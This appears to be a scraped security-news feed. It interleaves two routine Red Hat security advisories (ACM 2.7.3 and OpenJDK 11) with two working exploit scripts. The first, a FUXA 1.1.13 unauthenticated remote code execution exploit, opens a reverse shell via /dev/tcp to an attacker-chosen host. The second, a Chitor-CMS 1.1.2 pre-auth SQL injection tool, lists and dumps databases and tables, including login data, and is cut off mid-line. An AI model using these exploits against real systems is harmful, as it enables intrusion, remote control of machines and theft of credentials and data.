Red Hat Security Advisory 2023-1888-01 - Red Hat Advanced Cluster Management for Kubernetes 2.7.3 images Red Hat Advanced Cluster Management for Kubernetes provides the capabilities to address common challenges that administrators and site reliability engineers face as they work across a range of public and private cloud environments. Clusters and applications are all visible and managed from a single console—with security policy built in. This advisory contains the container images for Red Hat Advanced Cluster Management for Kubernetes, which fix several bugs. Issues addressed include denial of service and server-side request forgery vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Critical: Red Hat Advanced Cluster Management 2.7.3 security fixes and bug fixes  
Advisory ID:       RHSA-2023:1888-01  
Product:           Red Hat ACM  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1888  
Issue date:        2023-04-19  
CVE Names:         CVE-2022-3841 CVE-2022-4304 CVE-2022-4450   
                   CVE-2022-25881 CVE-2023-0215 CVE-2023-0286   
                   CVE-2023-0361 CVE-2023-23916 CVE-2023-29017   
                   CVE-2023-29199 CVE-2023-30547   
=====================================================================

1. Summary:

Red Hat Advanced Cluster Management for Kubernetes 2.7.3 General  
Availability release images, which fix bugs and security updates container  
images.

Red Hat Product Security has rated this update as having a security impact  
of Critical. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE links in the References section.

2. Description:

Red Hat Advanced Cluster Management for Kubernetes 2.7.3 images

Red Hat Advanced Cluster Management for Kubernetes provides the  
capabilities to address common challenges that administrators and site  
reliability engineers face as they work across a range of public and  
private cloud environments. Clusters and applications are all visible and  
managed from a single console—with security policy built in.

This advisory contains the container images for Red Hat Advanced Cluster  
Management for Kubernetes, which fix several bugs. See the following  
Release Notes documentation, which will be updated shortly for this  
release, for additional details about this release:

https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.7/html/release_notes/

Security fix(es)  
* CVE-2022-25881 http-cache-semantics: Regular Expression Denial of Service  
(ReDoS) vulnerability  
* CVE-2022-3841 RHACM: unauthenticated SSRF in console API endpoint  
* CVE-2023-29017 vm2: Sandbox Escape  
* CVE-2023-29199 vm2: Sandbox Escape  
* CVE-2023-30547 vm2: Sandbox Escape when exception sanitization

3. Solution:

For Red Hat Advanced Cluster Management for Kubernetes, see the following  
documentation, which will be updated shortly for this release, for  
important  
instructions on installing this release:

https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.7/html-single/install/index#installing

4. Bugs fixed (https://bugzilla.redhat.com/):

2139426 - CVE-2022-3841 RHACM: unauthenticated SSRF in console API endpoint  
2165824 - CVE-2022-25881 http-cache-semantics: Regular Expression Denial of Service (ReDoS) vulnerability  
2185374 - CVE-2023-29017 vm2: sandbox escape  
2187409 - CVE-2023-29199 vm2: Sandbox Escape  
2187608 - CVE-2023-30547 vm2: Sandbox Escape when exception sanitization

5. References:

https://access.redhat.com/security/cve/CVE-2022-3841  
https://access.redhat.com/security/cve/CVE-2022-4304  
https://access.redhat.com/security/cve/CVE-2022-4450  
https://access.redhat.com/security/cve/CVE-2022-25881  
https://access.redhat.com/security/cve/CVE-2023-0215  
https://access.redhat.com/security/cve/CVE-2023-0286  
https://access.redhat.com/security/cve/CVE-2023-0361  
https://access.redhat.com/security/cve/CVE-2023-23916  
https://access.redhat.com/security/cve/CVE-2023-29017  
https://access.redhat.com/security/cve/CVE-2023-29199  
https://access.redhat.com/security/cve/CVE-2023-30547  
https://access.redhat.com/security/updates/classification/#critical

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZEDAetzjgjWX9erEAQh5fA/+KC+VaXxFK6j+Pet9+HvZcnFhGAHkmsYb  
GOzEP952uIfv8ccZZKKG6PuEb3TTxQ6ZdWYddlw7o66QT15+G6ERfgKBtmNPJmIx  
ptRc0tC0iHVN8q/bYuKoHK0mse+8yCWzYd4X4Bm1Z2srFa/RBMuyb50C9kgc9JhC  
Fg9XhGymjNvuw/Ia2tFlfsQdmA9juWdMJSrwUofeZUzOg+j8Tv6CpAhkq21TacBC  
Kgb1J1yp9WT6q16EFtaNtRDvCSmILQddgl3rGFiTO0arWxnYnGji3oF/foyIUDtN  
zj7lEgbgyGoWxmlS2dUgQr8mLpcGFILSy1hksgK/N10bfCo6QXTgs/ydu56ju/Tz  
2uVqt8TB+VYYDPWSmV9uebpYSy55mkc3IotBGYI94FAcWharsskzsWFfr3ImBdy+  
RaOHlzPFlkR6gkA6CAIXezhC/hbCBgCv2BbNSCzXeKX3L38WIr1kIcdmrKW8XaG/  
/xLeJhA1dl5jZUOp/amZK1Q8L8SIBy61jjJ6xXrINT73hZyw09TyX2Dw/uKZQrsT  
jQhx7syUugogGbHwsfE7IPfLS2ba0rRCK5xxEuqN8yBaU/7aVD85KWnFS7SsPvHh  
L2sgIbLdWpkor8o6dALYhc/qWs8D/PiRxw5wGvY5VuaetdThGuBg84xqpd0uEyQC  
0xvOqpmd150=  
=Wgxp  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1888-01

FUXA version 1.1.13-1186 suffers from an unauthenticated remote code execution vulnerability.

    # Exploit Title: FUXA V.1.1.13-1186- Unauthenticated Remote Code Execution (RCE)# Date: 18/04/2023# Exploit Author: Rodolfo Mariano# Vendor Homepage: https://github.com/frangoteam/FUXA# Version: FUXA V.1.1.13-1186 (current)from argparse import RawTextHelpFormatterimport argparse, sys, threading, requestsdef main(rhost, rport, lhost, lport):    url = "http://"+rhost+":"+rport+"/api/runscript"    payload = {        "headers":            {                "normalizedNames":{},                "lazyUpdate": "null"            },            "params":{                "script":{                    "parameters":[                    {                    "name":"ok",                    "type":"tagid",                    "value":""                    }                    ],                    "mode":"",                    "id":"",                    "test":"true",                    "name":"ok",                    "outputId":"",                    "code":"require('child_process').exec('/bin/bash -c \"/bin/sh -i >& /dev/tcp/%s/%s 0>&1\"')" % (lhost,lport)                }            }        }    response = requests.post(url, json=payload)args = Noneparser = argparse.ArgumentParser(formatter_class=RawTextHelpFormatter, usage="python exploit.py --rhosts <ip> --rport <rport>--lport <port>")parser.add_argument('--rhost', dest='rhost', action='store', type=str, help='insert an rhost')parser.add_argument('--rport', dest='rport', action='store', type=str, help='insert an rport', default=1881)parser.add_argument('--lhost', dest='lhost', action='store', type=str, help='insert an lhost')parser.add_argument('--lport', dest='lport', action='store', type=str, help='insert an lport')args=parser.parse_args()main(args.rhost, args.rport, args.lhost, args.lport)

FUXA 1.1.13-1186 Remote Code Execution

Red Hat Security Advisory 2023-1899-01 - The java-11-openjdk packages provide the OpenJDK 11 Java Runtime Environment and the OpenJDK 11 Java Software Development Kit.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: java-11-openjdk security update  
Advisory ID:       RHSA-2023:1899-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1899  
Issue date:        2023-04-20  
CVE Names:         CVE-2023-21930 CVE-2023-21937 CVE-2023-21938   
                   CVE-2023-21939 CVE-2023-21954 CVE-2023-21967   
                   CVE-2023-21968   
=====================================================================

1. Summary:

An update for java-11-openjdk is now available for Red Hat Enterprise Linux  
9.0 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat CodeReady Linux Builder EUS (v.9.0) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux AppStream EUS (v.9.0) - aarch64, ppc64le, s390x, x86_64

3. Description:

The java-11-openjdk packages provide the OpenJDK 11 Java Runtime  
Environment and the OpenJDK 11 Java Software Development Kit.

Security Fix(es):

* OpenJDK: improper connection handling during TLS handshake (8294474)  
(CVE-2023-21930)

* OpenJDK: Swing HTML parsing issue (8296832) (CVE-2023-21939)

* OpenJDK: incorrect enqueue of references in garbage collector (8298191)  
(CVE-2023-21954)

* OpenJDK: certificate validation issue in TLS session negotiation  
(8298310) (CVE-2023-21967)

* OpenJDK: missing string checks for NULL characters (8296622)  
(CVE-2023-21937)

* OpenJDK: incorrect handling of NULL characters in ProcessBuilder  
(8295304) (CVE-2023-21938)

* OpenJDK: missing check for slash characters in URI-to-path conversion  
(8298667) (CVE-2023-21968)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of OpenJDK Java must be restarted for this update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2187435 - CVE-2023-21930 OpenJDK: improper connection handling during TLS handshake (8294474)  
2187441 - CVE-2023-21954 OpenJDK: incorrect enqueue of references in garbage collector (8298191)  
2187704 - CVE-2023-21967 OpenJDK: certificate validation issue in TLS session negotiation (8298310)  
2187724 - CVE-2023-21939 OpenJDK: Swing HTML parsing issue (8296832)  
2187758 - CVE-2023-21938 OpenJDK: incorrect handling of NULL characters in ProcessBuilder (8295304)  
2187790 - CVE-2023-21937 OpenJDK: missing string checks for NULL characters (8296622)  
2187802 - CVE-2023-21968 OpenJDK: missing check for slash characters in URI-to-path conversion (8298667)

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.9.0):

Source:  
java-11-openjdk-11.0.19.0.7-1.el9_0.src.rpm

aarch64:  
java-11-openjdk-11.0.19.0.7-1.el9_0.aarch64.rpm  
java-11-openjdk-debuginfo-11.0.19.0.7-1.el9_0.aarch64.rpm  
java-11-openjdk-debugsource-11.0.19.0.7-1.el9_0.aarch64.rpm  
java-11-openjdk-demo-11.0.19.0.7-1.el9_0.aarch64.rpm  
java-11-openjdk-devel-11.0.19.0.7-1.el9_0.aarch64.rpm  
java-11-openjdk-devel-debuginfo-11.0.19.0.7-1.el9_0.aarch64.rpm  
java-11-openjdk-headless-11.0.19.0.7-1.el9_0.aarch64.rpm  
java-11-openjdk-headless-debuginfo-11.0.19.0.7-1.el9_0.aarch64.rpm  
java-11-openjdk-javadoc-11.0.19.0.7-1.el9_0.aarch64.rpm  
java-11-openjdk-javadoc-zip-11.0.19.0.7-1.el9_0.aarch64.rpm  
java-11-openjdk-jmods-11.0.19.0.7-1.el9_0.aarch64.rpm  
java-11-openjdk-src-11.0.19.0.7-1.el9_0.aarch64.rpm  
java-11-openjdk-static-libs-11.0.19.0.7-1.el9_0.aarch64.rpm

ppc64le:  
java-11-openjdk-11.0.19.0.7-1.el9_0.ppc64le.rpm  
java-11-openjdk-debuginfo-11.0.19.0.7-1.el9_0.ppc64le.rpm  
java-11-openjdk-debugsource-11.0.19.0.7-1.el9_0.ppc64le.rpm  
java-11-openjdk-demo-11.0.19.0.7-1.el9_0.ppc64le.rpm  
java-11-openjdk-devel-11.0.19.0.7-1.el9_0.ppc64le.rpm  
java-11-openjdk-devel-debuginfo-11.0.19.0.7-1.el9_0.ppc64le.rpm  
java-11-openjdk-headless-11.0.19.0.7-1.el9_0.ppc64le.rpm  
java-11-openjdk-headless-debuginfo-11.0.19.0.7-1.el9_0.ppc64le.rpm  
java-11-openjdk-javadoc-11.0.19.0.7-1.el9_0.ppc64le.rpm  
java-11-openjdk-javadoc-zip-11.0.19.0.7-1.el9_0.ppc64le.rpm  
java-11-openjdk-jmods-11.0.19.0.7-1.el9_0.ppc64le.rpm  
java-11-openjdk-src-11.0.19.0.7-1.el9_0.ppc64le.rpm  
java-11-openjdk-static-libs-11.0.19.0.7-1.el9_0.ppc64le.rpm

s390x:  
java-11-openjdk-11.0.19.0.7-1.el9_0.s390x.rpm  
java-11-openjdk-debuginfo-11.0.19.0.7-1.el9_0.s390x.rpm  
java-11-openjdk-debugsource-11.0.19.0.7-1.el9_0.s390x.rpm  
java-11-openjdk-demo-11.0.19.0.7-1.el9_0.s390x.rpm  
java-11-openjdk-devel-11.0.19.0.7-1.el9_0.s390x.rpm  
java-11-openjdk-devel-debuginfo-11.0.19.0.7-1.el9_0.s390x.rpm  
java-11-openjdk-headless-11.0.19.0.7-1.el9_0.s390x.rpm  
java-11-openjdk-headless-debuginfo-11.0.19.0.7-1.el9_0.s390x.rpm  
java-11-openjdk-javadoc-11.0.19.0.7-1.el9_0.s390x.rpm  
java-11-openjdk-javadoc-zip-11.0.19.0.7-1.el9_0.s390x.rpm  
java-11-openjdk-jmods-11.0.19.0.7-1.el9_0.s390x.rpm  
java-11-openjdk-src-11.0.19.0.7-1.el9_0.s390x.rpm  
java-11-openjdk-static-libs-11.0.19.0.7-1.el9_0.s390x.rpm

x86_64:  
java-11-openjdk-11.0.19.0.7-1.el9_0.x86_64.rpm  
java-11-openjdk-debuginfo-11.0.19.0.7-1.el9_0.x86_64.rpm  
java-11-openjdk-debugsource-11.0.19.0.7-1.el9_0.x86_64.rpm  
java-11-openjdk-demo-11.0.19.0.7-1.el9_0.x86_64.rpm  
java-11-openjdk-devel-11.0.19.0.7-1.el9_0.x86_64.rpm  
java-11-openjdk-devel-debuginfo-11.0.19.0.7-1.el9_0.x86_64.rpm  
java-11-openjdk-headless-11.0.19.0.7-1.el9_0.x86_64.rpm  
java-11-openjdk-headless-debuginfo-11.0.19.0.7-1.el9_0.x86_64.rpm  
java-11-openjdk-javadoc-11.0.19.0.7-1.el9_0.x86_64.rpm  
java-11-openjdk-javadoc-zip-11.0.19.0.7-1.el9_0.x86_64.rpm  
java-11-openjdk-jmods-11.0.19.0.7-1.el9_0.x86_64.rpm  
java-11-openjdk-src-11.0.19.0.7-1.el9_0.x86_64.rpm  
java-11-openjdk-static-libs-11.0.19.0.7-1.el9_0.x86_64.rpm

Red Hat CodeReady Linux Builder EUS (v.9.0):

aarch64:  
java-11-openjdk-debuginfo-11.0.19.0.7-1.el9_0.aarch64.rpm  
java-11-openjdk-debugsource-11.0.19.0.7-1.el9_0.aarch64.rpm  
java-11-openjdk-demo-fastdebug-11.0.19.0.7-1.el9_0.aarch64.rpm  
java-11-openjdk-demo-slowdebug-11.0.19.0.7-1.el9_0.aarch64.rpm  
java-11-openjdk-devel-debuginfo-11.0.19.0.7-1.el9_0.aarch64.rpm  
java-11-openjdk-devel-fastdebug-11.0.19.0.7-1.el9_0.aarch64.rpm  
java-11-openjdk-devel-fastdebug-debuginfo-11.0.19.0.7-1.el9_0.aarch64.rpm  
java-11-openjdk-devel-slowdebug-11.0.19.0.7-1.el9_0.aarch64.rpm  
java-11-openjdk-devel-slowdebug-debuginfo-11.0.19.0.7-1.el9_0.aarch64.rpm  
java-11-openjdk-fastdebug-11.0.19.0.7-1.el9_0.aarch64.rpm  
java-11-openjdk-fastdebug-debuginfo-11.0.19.0.7-1.el9_0.aarch64.rpm  
java-11-openjdk-headless-debuginfo-11.0.19.0.7-1.el9_0.aarch64.rpm  
java-11-openjdk-headless-fastdebug-11.0.19.0.7-1.el9_0.aarch64.rpm  
java-11-openjdk-headless-fastdebug-debuginfo-11.0.19.0.7-1.el9_0.aarch64.rpm  
java-11-openjdk-headless-slowdebug-11.0.19.0.7-1.el9_0.aarch64.rpm  
java-11-openjdk-headless-slowdebug-debuginfo-11.0.19.0.7-1.el9_0.aarch64.rpm  
java-11-openjdk-jmods-fastdebug-11.0.19.0.7-1.el9_0.aarch64.rpm  
java-11-openjdk-jmods-slowdebug-11.0.19.0.7-1.el9_0.aarch64.rpm  
java-11-openjdk-slowdebug-11.0.19.0.7-1.el9_0.aarch64.rpm  
java-11-openjdk-slowdebug-debuginfo-11.0.19.0.7-1.el9_0.aarch64.rpm  
java-11-openjdk-src-fastdebug-11.0.19.0.7-1.el9_0.aarch64.rpm  
java-11-openjdk-src-slowdebug-11.0.19.0.7-1.el9_0.aarch64.rpm  
java-11-openjdk-static-libs-fastdebug-11.0.19.0.7-1.el9_0.aarch64.rpm  
java-11-openjdk-static-libs-slowdebug-11.0.19.0.7-1.el9_0.aarch64.rpm

ppc64le:  
java-11-openjdk-debuginfo-11.0.19.0.7-1.el9_0.ppc64le.rpm  
java-11-openjdk-debugsource-11.0.19.0.7-1.el9_0.ppc64le.rpm  
java-11-openjdk-demo-fastdebug-11.0.19.0.7-1.el9_0.ppc64le.rpm  
java-11-openjdk-demo-slowdebug-11.0.19.0.7-1.el9_0.ppc64le.rpm  
java-11-openjdk-devel-debuginfo-11.0.19.0.7-1.el9_0.ppc64le.rpm  
java-11-openjdk-devel-fastdebug-11.0.19.0.7-1.el9_0.ppc64le.rpm  
java-11-openjdk-devel-fastdebug-debuginfo-11.0.19.0.7-1.el9_0.ppc64le.rpm  
java-11-openjdk-devel-slowdebug-11.0.19.0.7-1.el9_0.ppc64le.rpm  
java-11-openjdk-devel-slowdebug-debuginfo-11.0.19.0.7-1.el9_0.ppc64le.rpm  
java-11-openjdk-fastdebug-11.0.19.0.7-1.el9_0.ppc64le.rpm  
java-11-openjdk-fastdebug-debuginfo-11.0.19.0.7-1.el9_0.ppc64le.rpm  
java-11-openjdk-headless-debuginfo-11.0.19.0.7-1.el9_0.ppc64le.rpm  
java-11-openjdk-headless-fastdebug-11.0.19.0.7-1.el9_0.ppc64le.rpm  
java-11-openjdk-headless-fastdebug-debuginfo-11.0.19.0.7-1.el9_0.ppc64le.rpm  
java-11-openjdk-headless-slowdebug-11.0.19.0.7-1.el9_0.ppc64le.rpm  
java-11-openjdk-headless-slowdebug-debuginfo-11.0.19.0.7-1.el9_0.ppc64le.rpm  
java-11-openjdk-jmods-fastdebug-11.0.19.0.7-1.el9_0.ppc64le.rpm  
java-11-openjdk-jmods-slowdebug-11.0.19.0.7-1.el9_0.ppc64le.rpm  
java-11-openjdk-slowdebug-11.0.19.0.7-1.el9_0.ppc64le.rpm  
java-11-openjdk-slowdebug-debuginfo-11.0.19.0.7-1.el9_0.ppc64le.rpm  
java-11-openjdk-src-fastdebug-11.0.19.0.7-1.el9_0.ppc64le.rpm  
java-11-openjdk-src-slowdebug-11.0.19.0.7-1.el9_0.ppc64le.rpm  
java-11-openjdk-static-libs-fastdebug-11.0.19.0.7-1.el9_0.ppc64le.rpm  
java-11-openjdk-static-libs-slowdebug-11.0.19.0.7-1.el9_0.ppc64le.rpm

s390x:  
java-11-openjdk-debuginfo-11.0.19.0.7-1.el9_0.s390x.rpm  
java-11-openjdk-debugsource-11.0.19.0.7-1.el9_0.s390x.rpm  
java-11-openjdk-demo-slowdebug-11.0.19.0.7-1.el9_0.s390x.rpm  
java-11-openjdk-devel-debuginfo-11.0.19.0.7-1.el9_0.s390x.rpm  
java-11-openjdk-devel-slowdebug-11.0.19.0.7-1.el9_0.s390x.rpm  
java-11-openjdk-devel-slowdebug-debuginfo-11.0.19.0.7-1.el9_0.s390x.rpm  
java-11-openjdk-headless-debuginfo-11.0.19.0.7-1.el9_0.s390x.rpm  
java-11-openjdk-headless-slowdebug-11.0.19.0.7-1.el9_0.s390x.rpm  
java-11-openjdk-headless-slowdebug-debuginfo-11.0.19.0.7-1.el9_0.s390x.rpm  
java-11-openjdk-jmods-slowdebug-11.0.19.0.7-1.el9_0.s390x.rpm  
java-11-openjdk-slowdebug-11.0.19.0.7-1.el9_0.s390x.rpm  
java-11-openjdk-slowdebug-debuginfo-11.0.19.0.7-1.el9_0.s390x.rpm  
java-11-openjdk-src-slowdebug-11.0.19.0.7-1.el9_0.s390x.rpm  
java-11-openjdk-static-libs-slowdebug-11.0.19.0.7-1.el9_0.s390x.rpm

x86_64:  
java-11-openjdk-debuginfo-11.0.19.0.7-1.el9_0.x86_64.rpm  
java-11-openjdk-debugsource-11.0.19.0.7-1.el9_0.x86_64.rpm  
java-11-openjdk-demo-fastdebug-11.0.19.0.7-1.el9_0.x86_64.rpm  
java-11-openjdk-demo-slowdebug-11.0.19.0.7-1.el9_0.x86_64.rpm  
java-11-openjdk-devel-debuginfo-11.0.19.0.7-1.el9_0.x86_64.rpm  
java-11-openjdk-devel-fastdebug-11.0.19.0.7-1.el9_0.x86_64.rpm  
java-11-openjdk-devel-fastdebug-debuginfo-11.0.19.0.7-1.el9_0.x86_64.rpm  
java-11-openjdk-devel-slowdebug-11.0.19.0.7-1.el9_0.x86_64.rpm  
java-11-openjdk-devel-slowdebug-debuginfo-11.0.19.0.7-1.el9_0.x86_64.rpm  
java-11-openjdk-fastdebug-11.0.19.0.7-1.el9_0.x86_64.rpm  
java-11-openjdk-fastdebug-debuginfo-11.0.19.0.7-1.el9_0.x86_64.rpm  
java-11-openjdk-headless-debuginfo-11.0.19.0.7-1.el9_0.x86_64.rpm  
java-11-openjdk-headless-fastdebug-11.0.19.0.7-1.el9_0.x86_64.rpm  
java-11-openjdk-headless-fastdebug-debuginfo-11.0.19.0.7-1.el9_0.x86_64.rpm  
java-11-openjdk-headless-slowdebug-11.0.19.0.7-1.el9_0.x86_64.rpm  
java-11-openjdk-headless-slowdebug-debuginfo-11.0.19.0.7-1.el9_0.x86_64.rpm  
java-11-openjdk-jmods-fastdebug-11.0.19.0.7-1.el9_0.x86_64.rpm  
java-11-openjdk-jmods-slowdebug-11.0.19.0.7-1.el9_0.x86_64.rpm  
java-11-openjdk-slowdebug-11.0.19.0.7-1.el9_0.x86_64.rpm  
java-11-openjdk-slowdebug-debuginfo-11.0.19.0.7-1.el9_0.x86_64.rpm  
java-11-openjdk-src-fastdebug-11.0.19.0.7-1.el9_0.x86_64.rpm  
java-11-openjdk-src-slowdebug-11.0.19.0.7-1.el9_0.x86_64.rpm  
java-11-openjdk-static-libs-fastdebug-11.0.19.0.7-1.el9_0.x86_64.rpm  
java-11-openjdk-static-libs-slowdebug-11.0.19.0.7-1.el9_0.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-21930  
https://access.redhat.com/security/cve/CVE-2023-21937  
https://access.redhat.com/security/cve/CVE-2023-21938  
https://access.redhat.com/security/cve/CVE-2023-21939  
https://access.redhat.com/security/cve/CVE-2023-21954  
https://access.redhat.com/security/cve/CVE-2023-21967  
https://access.redhat.com/security/cve/CVE-2023-21968  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZEDAWtzjgjWX9erEAQh2+BAAg96Nob467z9WoHbfejGkA/fuVXGyT6Im  
e17a1faLlAl73a3134YcVRZ/Zwa3EQAu1wxBPGbMEYWA+llWNcHZQHwJ7WuL+pav  
mpJQoQ5o/qZPsjTmSAuBaMKYq+Ls048C8lN1COQhuNxcHtfbNA8elX7CeFRnQE7D  
6ghWTvLKe4vKb/3/e0Kb8emsc+1t63SRwNESHp92BpnLF3Bswk4HJai+WmoIHvav  
HFyyeHn1dCKzRuCKlyNY1WaAaed/gHcdwzRz9OCAPZxAP7qvSXiFOnjWZ6dvmFY4  
+EOERAeGcfsdH5Hm4UPfp/vYGUxlWR4vP6izPCDz1jr+WYb6xmOwLlq1SZObKK+7  
9/jrNSxrcnzhoWes2ZemrboogUioJypuvs5HZZwOu76GFz4JAdAJGowoiWZKNcFq  
fceS4aJwPfElKtgUL9k7RfCNhtD+VRGI32AwMFcRXkTSMCwslSgMVrgAoT8lqohq  
BwPBrnJVEOIhflW4Ow2et7RogmkQOvV19nGFVTsDPW5pC3rbYayU0egE2Nk5oAj/  
mjkxtUTcMRrdiYicoEVCLwm6LdfBHob2vdsA0JP/BetwV4NGvsAD+wPjWNbJbJpW  
Nc70Js0sK4EVgV8YstQS4vSAlgo1TmSenb77em0wRThCxbwVMjcX2kRYG5jIfegL  
4ljjScuTZ5w=  
=7/ih  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1899-01

Chitor-CMS version 1.1.2 suffers from a remote SQL injection vulnerability.

    #!/usr/bin/python3########################################################                                                     # #  Exploit Title: Chitor-CMS v1.1.2 - Pre-Auth SQL Injection          ##  Date: 2023/04/13               ##  ExploitAuthor: msd0pe                                  ##  Project: https://github.com/waqaskanju/Chitor-CMS  ##  My Github: https://github.com/msd0pe-1             ##  Patched the 2023/04/16: 69d3442 commit             ##                                                     ########################################################__description__ = 'Chitor-CMS < 1.1.2 Pre-Auth SQL Injection.'__author__ = 'msd0pe'__version__ = '1.1'__date__ = '2023/04/13'class bcolors:    PURPLE = '\033[95m'    BLUE = '\033[94m'    GREEN = '\033[92m'    OCRA = '\033[93m'    RED = '\033[91m'    CYAN = '\033[96m'    ENDC = '\033[0m'    BOLD = '\033[1m'    UNDERLINE = '\033[4m'class infos:    INFO = "[" + bcolors.OCRA + bcolors.BOLD + "?" + bcolors.ENDC + bcolors.ENDC + "] "    ERROR = "[" + bcolors.RED + bcolors.BOLD + "X" + bcolors.ENDC + bcolors.ENDC + "] "    GOOD = "[" + bcolors.GREEN + bcolors.BOLD + "+" + bcolors.ENDC + bcolors.ENDC + "] "    PROCESS = "[" + bcolors.BLUE + bcolors.BOLD + "*" + bcolors.ENDC + bcolors.ENDC + "] "import reimport requestsimport optparsefrom prettytable import PrettyTabledef DumpTable(url, database, table):    header = {"User-Agent": "5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"}    x = PrettyTable()    columns = []    payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Ccolumn_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=\"" + table + "\" AND table_schema=\"" + database + "\"-- -"    u = requests.get(url + payload, headers=header)    try:        r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)        r = r[0].replace('\"',"").split(',')        if r == []:            pass        else:            for i in r:                columns.append(i)                pass    except:        pass    x.field_names = columns    payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2C " + str(columns).replace("[","").replace("]","").replace("\'","").replace(" ","") + "))%2C0x716a6b6271) FROM " + database + "." + table + "-- -"    u = requests.get(url + payload, headers=header)    try:        r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)        r = r[0].replace('\"',"").split(',')        if r == []:            pass        else:            for i in r:                i = i.split("xzmdpl")                x.add_rows([i])    except ValueError:        r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)        r = r[0].replace('\"',"").split(',')        if r == []:            pass        else:            for i in r:                i = i.split("xzmdpl")                i.append("")                x.add_rows([i])            print(x)def ListTables(url, database):    header = {"User-Agent": "5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"}    x = PrettyTable()    x.field_names = ["TABLES"]    payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Ctable_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x" + str(database).encode('utf-8').hex() + ")-- -"    u = requests.get(url + payload, headers=header)    try:        r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)        r = r[0].replace('\"',"").split(',')        if r == []:            pass        else:            for i in r:                x.add_row([i])    except:        pass    print(x)def ListDatabases(url):    header = {"User-Agent": "5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"}    x = PrettyTable()    x.field_names = ["DATABASES"]    payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Cschema_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.SCHEMATA-- -"    u = requests.get(url + payload, headers=header)    try:        r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)        r = r[0].replace('\"',"").split(',')        if r == []:            pass        else:            for i in r:                x.add_row([i])    except:        pass    print(x)def Main():    Menu = optparse.OptionParser(usage='python %prog [options]', version='%prog ' + __version__)    Menu.add_option('-u', '--url', type="str", dest="url", help='target url')    Menu.add_option('--dbs', action="store_true", dest="l_databases", help='list databases')    Menu.add_option('-D', '--db', type="str", dest="database", help='select a database')    Menu.add_option('--tables', action="store_true", dest="l_tables", help='list tables')    Menu.add_option('-T', '--table', type="str", dest="table", help='select a table')    Menu.add_option('--dump', action="store_true", dest="dump", help='dump the content')    (options, args) = Menu.parse_args()    Examples = optparse.OptionGroup(Menu, "Examples", """python3 chitor1.1.py -u http://127.0.0.1 --dbs                                                         python3 chitor1.1.py -u http://127.0.0.1 -D chitor_db --tables                                                         python3 chitor1.1.py -u http://127.0.0.1 -D chitor_db -T login --dump    """)    Menu.add_option_group(Examples)    if len(args) != 0 or options == {'url': None, 'l_databases': None, 'database': None, 'l_tables': None, 'table': None, 'dump': None}:        Menu.print_help()        print('')        print('  %s' % __description__)        print('  Source code put in public domain by ' + bcolors.PURPLE + bcolors.BOLD + 'msd0pe' + bcolors.ENDC + bcolors.ENDC + ',' + bcolors.RED + bcolors.BOLD + 'no Copyright' + bcolors.ENDC + 